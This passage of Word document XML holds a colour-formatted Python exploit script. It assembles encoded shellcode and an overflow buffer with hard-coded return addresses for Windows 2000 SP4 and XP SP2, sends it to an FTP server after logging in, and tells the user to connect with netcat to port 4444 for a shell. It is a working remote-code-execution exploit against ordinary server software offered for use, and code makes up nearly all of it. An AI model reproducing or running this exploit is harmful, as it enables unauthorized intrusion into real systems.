            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"</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 Change RET address if need be.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">buffer = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'\x41'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">*</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d36363"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">966</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+struct.pack(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'&lt;L'</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d36363"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0x7C2FA0F7</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)+</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'\x42'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">*</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d36363"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">32</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">+sc </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># RET Windows 2000 Server SP4</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888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#buffer = '\x41'*970+struct.pack('&lt;L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2</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fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">:</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Edit the IP, Username and Password.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">ftp = FTP(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'127.0.0.1'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">ftp.login(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'ftp'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'ftp'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\nEvil Buffer sent..."</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fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\nTry connecting with netcat to port 4444 on the remote machine."</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fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">except</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
